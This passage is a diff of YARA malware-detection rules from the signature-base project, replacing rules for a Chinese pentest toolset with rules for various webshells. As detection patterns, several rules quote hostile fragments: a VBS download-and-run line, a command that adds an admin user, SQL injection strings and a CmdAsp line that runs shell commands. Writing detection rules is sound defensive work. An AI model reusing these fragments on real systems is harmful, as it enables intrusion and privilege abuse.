 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "ae4954c142ad1552a2abaef5636c7ef68fdd99ee"
-		logic_hash = "457035b1685ac7f1bdccaab0b64bb1ad3ca1bf5e0747222347ced2a11b9b9504"
-		score = 70
+		hash = "262317c95ced56224f136ba532b8b34f"
+		logic_hash = "ab767a7016318633055a85195ca2bab08a8c68222d46018aaf8772ab27a373c4"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "Arp EMP v1.0.exe" fullword wide
+		$s1 = "$Info: This file is packed with the UPX executable packer http://upx.tsx.org $"
+		$s2 = "5pur+virtu!"
+		$s3 = "ugh spac#n"
+		$s4 = "xcEx3WriL4"
+		$s5 = "runtime error"
+		$s6 = "loseHWait.Sr."
+		$s7 = "essageBoxAw"
+		$s8 = "$Id: UPX 1.07 Copyright (C) 1996-2001 the UPX Team. All Rights Reserved. $"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 400KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Honker_Getwebshell : FILE
+rule SIGNATURE_BASE_Binder2_Binder2
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file GetWebShell.exe"
+		description = "Webshells Auto-generated - file binder2.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "919883f4-af66-5d07-ad41-8cba3e049396"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L913-L930"
+		id = "29269dc0-f2e4-56ec-ad64-0dff00e339b7"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L7238-L7254"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "b63b53259260a7a316932c0a4b643862f65ee9f8"
-		logic_hash = "5d6638596607884950e702144416eb6fd3b009c88e4af5f81a50f346d7491c95"
-		score = 70
-		quality = 60
-		tags = "FILE"
+		hash = "d594e90ad23ae0bc0b65b59189c12f11"
+		logic_hash = "fbe56b7d37fc7863fcf55761c0b5b671d661a713ac95f90d65b79eee9a447a9b"
+		score = 75
+		quality = 85
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "echo P.Open \"GET\",\"http://www.baidu.com/ma.exe\",0 >>run.vbs" fullword ascii
-		$s5 = "http://127.0.0.1/sql.asp?id=1" fullword wide
-		$s14 = "net user admin$ hack /add" fullword wide
-		$s15 = ";Drop table [hack];create table [dbo].[hack] ([cmd] [image])--" fullword wide
+		$s0 = "IsCharAlphaNumericA"
+		$s2 = "WideCharToM"
+		$s4 = "g 5pur+virtu!"
+		$s5 = "\\syslog.en"
+		$s6 = "heap7'7oqk?not="
+		$s8 = "- Kablto in"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 70KB and 1 of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Honker_Cracker_SHELL : FILE
+rule SIGNATURE_BASE_Thelast_Orice2
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file SHELL.exe"
+		description = "Webshells Auto-generated - file orice2.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "2249a058-7469-5054-9c51-cb20ef8197ca"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L932-L949"
+		id = "968cef9e-0163-5f4a-91e3-07510f9f4fcd"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L7255-L7267"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "c1dc349ff44a45712937a8a9518170da8d4ee656"
-		logic_hash = "03da662e8d5dfbae524c4949d90e143714e6c4783e02600e059172e8b09ebc57"
-		score = 70
+		hash = "aa63ffb27bde8d03d00dda04421237ae"
+		logic_hash = "075f3377a9b90c6c1ba74682415b9c0832a839afe647fa6d3c85d4e987618405"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "http://127.0.0.1/error1.asp" fullword ascii
-		$s2 = "password,PASSWORD,pass,PASS,Lpass,lpass,Password" fullword wide
-		$s3 = "\\SHELL" wide
-		$s4 = "WebBrowser1" fullword ascii
+		$s0 = " $aa = $_GET['aa'];"
+		$s1 = "echo $aa;"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 200KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Honker_MSTSC_Can_Direct_Copy : FILE
+rule SIGNATURE_BASE_FSO_S_Sincap
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file MSTSC_can_direct_copy.EXE"
+		description = "Webshells Auto-generated - file sincap.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "9155cb6f-14b6-524a-9cb9-1a88f7facf4e"
-		date = "2015-06-23"
-		modified = "2022-12-21"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L951-L968"
+		id = "fcee20a3-e71b-5f69-ac67-8660fd270703"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L7268-L7280"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "2f3cbfd9f82f8abafdb1d33235fa6bfa1e1f71ae"
-		logic_hash = "5437abd979a8df5ee3f8508f7a5fff85714b5d8a22ab1760fe1e7a8168a8c255"
-		score = 70
+		hash = "dc5c2c2392b84a1529abd92e98e9aa5b"
+		logic_hash = "705030e93248f5ea6744f78bd7a1816aaa9772880059286b8d686e05b193d4a0"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "srv\\newclient\\lib\\win32\\obj\\i386\\mstsc.pdb" ascii
-		$s2 = "Clear Password" fullword wide
-		$s3 = "/migrate -- migrates legacy connection files that were created with " fullword wide
+		$s0 = "    <font color=\"#E5E5E5\" style=\"font-size: 8pt; font-weight: 700\" face=\"Arial\">"
+		$s4 = "<body text=\"#008000\" bgcolor=\"#808080\" topmargin=\"0\" leftmargin=\"0\" rightmargin="
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 600KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Honker_Lcx_Lcx : FILE
+rule SIGNATURE_BASE_Phpshell
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - HTRAN - file lcx.exe"
+		description = "Webshells Auto-generated - file PhpShell.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "6c2e1e85-6387-5be2-b7b2-5ae8a5cca6df"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L970-L988"
+		id = "887264d3-5704-5e38-b0a6-44d529258ea2"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L7281-L7292"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "0c8779849d53d0772bbaa1cedeca150c543ebf38"
-		logic_hash = "6e81cac14baa9f0ae35eb26f30291cba6f7ef1864f8970b97a3e6e7205d10eb9"
-		score = 70
+		hash = "539baa0d39a9cf3c64d65ee7a8738620"
+		logic_hash = "95b3cedac370bf9b06092035a738722f3ec97e6cbafe3d4f742429a865576ad8"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "%s -<listen|tran|slave> <option> [-log logfile]" fullword ascii
-		$s2 = "=========== Code by lion & bkbll" ascii
-		$s3 = "Welcome to [url]http://www.cnhonker.com[/url] " ascii
-		$s4 = "-tran   <ConnectPort> <TransmitHost> <TransmitPort>" fullword ascii
-		$s5 = "[+] Start Transmit (%s:%d <-> %s:%d) ......" fullword ascii
+		$s2 = "href=\"http://www.gimpster.com/wiki/PhpShell\">www.gimpster.com/wiki/PhpShell</a>."
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 30KB and 1 of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Honker_Postgresql : FILE
+rule SIGNATURE_BASE_Hytop_Devpack_Config
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file PostgreSQL.exe"
+		description = "Webshells Auto-generated - file config.asp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "ae90d03c-ef67-5ece-81ae-86947196a81c"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L990-L1005"
+		id = "da1b8ce1-8b17-53f6-a86b-ad3fe918084e"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L7293-L7306"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "1ecfaa91aae579cfccb8b7a8607176c82ec726f4"
-		logic_hash = "f6921e7a7c88d70c77fc30dc273aac3679a3c0ab44d4d4706d7a405f16cff6a1"
-		score = 70
+		hash = "b41d0e64e64a685178a3155195921d61"
+		logic_hash = "b2806c30db413bca518943352f233c9d2915356a41eceed5e352b88ee34fbbd3"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "&http://192.168.16.186/details.php?id=1" fullword ascii
-		$s2 = "PostgreSQL_inject" fullword ascii
+		$s0 = "const adminPassword=\""
+		$s2 = "const userPassword=\""
+		$s3 = "const mVersion="
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 2000KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Honker_Webrobot : FILE
+rule SIGNATURE_BASE_Sendmail
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file WebRobot.exe"
+		description = "Webshells Auto-generated - file sendmail.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "8b6350b6-17ea-5f44-a42a-875d55bb2de8"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L1007-L1023"
+		id = "dd33c2bb-61bf-57b7-82b9-d864097f7a56"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L7307-L7319"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "af054994c911b4301490344fca4bb19a9f394a8f"
-		logic_hash = "7d7fc9fb9156aa20993dcb809f4e1d3d357f6826dcac7e628dbe6e0f81e5a61a"
-		score = 70
+		hash = "75b86f4a21d8adefaf34b3a94629bd17"
+		logic_hash = "bcca9a9380d2695bc277afc9fa72c24cb26ac44c6fbcc87113b017cfe190bdab"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "%d-%02d-%02d %02d^%02d^%02d ScanReprot.htm" fullword ascii
-		$s2 = "\\log\\ProgramDataFile.dat" ascii
-		$s3 = "\\data\\FilterKeyword.txt" ascii
+		$s3 = "_NextPyC808"
+		$s6 = "Copyright (C) 2000, Diamond Computer Systems Pty. Ltd. (www.diamondcs.com.au)"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 2000KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Honker_Baidu_Extractor_Ver1_0 : FILE
+rule SIGNATURE_BASE_FSO_S_Zehir4
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file Baidu_Extractor_Ver1.0.exe"
+		description = "Webshells Auto-generated - file zehir4.asp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "94f3c3d8-aa68-5589-b26f-42315634ff30"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L1025-L1042"
+		id = "9f1adcd6-b721-54ef-a20f-c3a353629a40"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L7320-L7331"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "1899f979360e96245d31082e7e96ccedbdbe1413"
-		logic_hash = "cba7357ab3cb840b3b115abe00e1a3a712feb036cae816c8ded10d73029efe2b"
-		score = 70
+		hash = "5b496a61363d304532bcf52ee21f5d55"
+		logic_hash = "6bcfb1ee40403394bf996ecbe1bb17f9afa0c3ba9e1906881b94bbc785b4a510"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s3 = "\\Users\\Admin" wide
-		$s11 = "soso.com" fullword wide
-		$s12 = "baidu.com" fullword wide
-		$s19 = "cmd /c ping " fullword wide
+		$s5 = " byMesaj "
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 500KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Honker_FTP_Scanning : FILE
+rule SIGNATURE_BASE_Hkshell_Hkshell
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file FTP_scanning.exe"
+		description = "Webshells Auto-generated - file hkshell.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "828a0dc8-3748-5c07-a767-4f9e85968ca1"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L1044-L1061"
+		id = "7436cd7c-7027-56dc-bb62-fac0f70c27d8"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L7332-L7345"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "5a3543ee5aed110c87cbc3973686e785bcb5c44e"
-		logic_hash = "5f1c312dc9fa80c120699bacd17d5e4c147ab96f90c619a8c39ec27646a1307f"
-		score = 70
+		hash = "168cab58cee59dc4706b3be988312580"
+		logic_hash = "bee4d4c957ede41c771d690d52ac2fd3655238cc1fc106d30fb2721084b38aa1"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "CNotSupportedE" fullword ascii
-		$s2 = "nINet.dll" fullword ascii
-		$s9 = "?=MODULE" fullword ascii
-		$s13 = "MSIE 6*" fullword ascii
+		$s1 = "PrSessKERNELU"
+		$s2 = "Cur3ntV7sion"
+		$s3 = "Explorer8"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 550KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Honker_Dirdown_Dirdown : FILE
+rule SIGNATURE_BASE_Imhapftp
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file dirdown.exe"
+		description = "Webshells Auto-generated - file iMHaPFtp.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "80f98131-79bf-580d-87ad-a54a3f14b301"
-		date = "2015-06-23"
-		modified = "2022-12-21"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L1063-L1080"
+		id = "c810c630-ce08-5059-ad49-f65b244f4d19"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L7346-L7357"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "7b8d51c72841532dded5fec7e7b0005855b8a051"
-		logic_hash = "5e8349096b7d07757c3779e13fba87f770a5ef090bc7efe36fd151c7c180edad"
-		score = 70
+		hash = "12911b73bc6a5d313b494102abcf5c57"
+		logic_hash = "c24bb80a0ae4284b4303450e9103c5dda30c41b41f323641ac1175461f741ced"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "\\Decompress\\obj\\Release\\Decompress.pdb" ascii
-		$s1 = "Decompress.exe" fullword wide
-		$s5 = "Get8Bytes" fullword ascii
+		$s1 = "echo \"\\t<th class=\\\"permission_header\\\"><a href=\\\"$self?{$d}sort=permission$r\\\">"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 45KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Honker_Xiaokui_Conversion_Tool : FILE
+rule SIGNATURE_BASE_Unpack_Tback
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file Xiaokui_conversion_tool.exe"
+		description = "Webshells Auto-generated - file TBack.dll"
 		author = "Florian Roth (Nextron Systems)"
-		id = "26e30df6-b1d9-5d82-b368-a4a904939aa3"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L1082-L1098"
+		id = "b5f93621-e1e9-5aed-b574-471b4c1f9570"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L7358-L7369"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "dccd163e94a774b01f90c1e79f186894e2f27de3"
-		logic_hash = "66a77c1fbfecdc02f591c12f69b46e39b7077dfbb5ed2a26a7dcfb11c8b464dc"
-		score = 70
-		quality = 60
-		tags = "FILE"
+		hash = "a9d1007823bf96fb163ab38726b48464"
+		logic_hash = "0fb43766c305f4235cc0987f411fdc3b3674723687f0b63d346429f4a7b5b87f"
+		score = 75
+		quality = 85
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "update [dv_user] set usergroupid=1 where userid=2;--" fullword ascii
-		$s2 = "To.exe" fullword wide
-		$s3 = "by zj1244" ascii
+		$s5 = "\\final\\new\\lcc\\public.dll"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 240KB and 2 of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Honker_Grouppolicyremover : FILE
+rule SIGNATURE_BASE_Darkspy105
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file GroupPolicyRemover.exe"
+		description = "Webshells Auto-generated - file DarkSpy105.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "e581172d-fcea-5281-ba9f-06b35c9a513e"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L1100-L1116"
+		id = "9d519ccf-fe52-5b82-a39d-c9f86c1089e1"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L7370-L7381"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "7475d694e189b35899a2baa462957ac3687513e5"
-		logic_hash = "936d5dea2d44f638abfb5e42f45c0678bcbf769b575b5056db1a1fc41d1643be"
-		score = 70
+		hash = "f0b85e7bec90dba829a3ede1ab7d8722"
+		logic_hash = "0f1c9dba4525f9c30f309500652ed6af647ddf492f483e101fc23c891e15fc85"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "GP_killer.EXE" fullword wide
-		$s1 = "GP_killer Microsoft " fullword wide
-		$s2 = "SHDeleteKeyA" fullword ascii
+		$s7 = "Sorry,DarkSpy got an unknown exception,please re-run it,thanks!"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 700KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Honker_Wordpressscanner : FILE
+rule SIGNATURE_BASE_Editserver_EXE
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file WordpressScanner.exe"
+		description = "Webshells Auto-generated - file EditServer.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "79195823-f88b-5c28-8b99-a43a9d6c94af"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L1118-L1135"
+		id = "97928144-0112-5288-8f95-acf7a0d56e71"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L7382-L7395"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "0b3c5015ba3616cbc616fc9ba805fea73e98bc83"
-		logic_hash = "c6c36ad5ff0ddfbc41464008d293d453bf2d312a6db885217785adf816bd8b20"
-		score = 70
+		hash = "f945de25e0eba3bdaf1455b3a62b9832"
+		logic_hash = "d440669b0c0bf575cf9dea946edf55f724300a4c765e90c631fc1eee062bf006"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" fullword ascii
-		$s1 = "(http://www.eyuyan.com)" fullword wide
-		$s2 = "GetConnectString" fullword ascii
-		$s4 = "#if !defined(AFX_RESOURCE_DLL) || defined(AFX_TARG_CHS)" fullword ascii
+		$s2 = "Server %s Have Been Configured"
+		$s5 = "The Server Password Exceeds 32 Characters"
+		$s8 = "9--Set Procecess Name To Inject DLL"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 1000KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Honker_Htran_V2_40_Htran20 : FILE
+rule SIGNATURE_BASE_FSO_S_Reader
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file htran20.exe"
+		description = "Webshells Auto-generated - file reader.asp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "9dd1ab4b-108e-55be-b94d-2868ce00855e"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L1137-L1156"
+		id = "d596f7f4-5b0d-5f17-94d3-2582ec041eb1"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L7396-L7407"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "b992bf5b04d362ed3757e90e57bc5d6b2a04e65c"
-		logic_hash = "41a85430875df622e7940ef26c6eceaa4e0720b2995521fbb2d4b072207c8e15"
-		score = 70
+		hash = "b598c8b662f2a1f6cc61f291fb0a6fa2"
+		logic_hash = "89a948f8da66173965884cd525615c8eeb91cf98a4984c05be7472034bb72f76"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "%s -slave  ConnectHost ConnectPort TransmitHost TransmitPort" fullword ascii
-		$s2 = "Enter Your Socks Type No: [0.BindPort 1.ConnectBack 2.Listen]:" fullword ascii
-		$s3 = "[SERVER]connection to %s:%d error" fullword ascii
-		$s4 = "%s -connect ConnectHost [ConnectPort]       Default:%d" fullword ascii
-		$s5 = "[+] got, ip:%s, port:%d" fullword ascii
-		$s6 = "[-] There is a error...Create a new connection." fullword ascii
+		$s2 = "mailto:mailbomb@hotmail."
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 200KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Honker_Dictionarygenerator : FILE
+rule SIGNATURE_BASE_ASP_Cmdasp
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file DictionaryGenerator.exe"
+		description = "Webshells Auto-generated - file CmdAsp.asp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "29ce6f8c-3092-5917-ab31-aaed7834c500"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L1158-L1173"
+		id = "e4b48843-1936-5717-b2b6-add5b4a14d04"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L7408-L7421"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "b3071c64953e97eeb2ca6796fab302d8a77d27bc"
-		logic_hash = "228bdbca3eb206e22a130e91caa2486174efba9356dbee67e80333c0cf0bb643"
-		score = 70
+		hash = "79d4f3425f7a89befb0ef3bafe5e332f"
+		logic_hash = "84c3148fe74b1afaa6e3bbff0aca8df1f1775759a36a673cc13d35ef7658929c"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "`PasswordBuilder" fullword ascii
-		$s2 = "cracker" fullword ascii
+		$s2 = "' -- Read the output from our command and remove the temp file -- '"
+		$s6 = "Call oScript.Run (\"cmd.exe /c \" & szCMD & \" > \" & szTempFile, 0, True)"
+		$s9 = "' -- create the COM objects that we will be using -- '"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 3650KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Honker_Ms11080_Withcmd : FILE
+rule SIGNATURE_BASE_KA_Ushell
 {
 	meta:
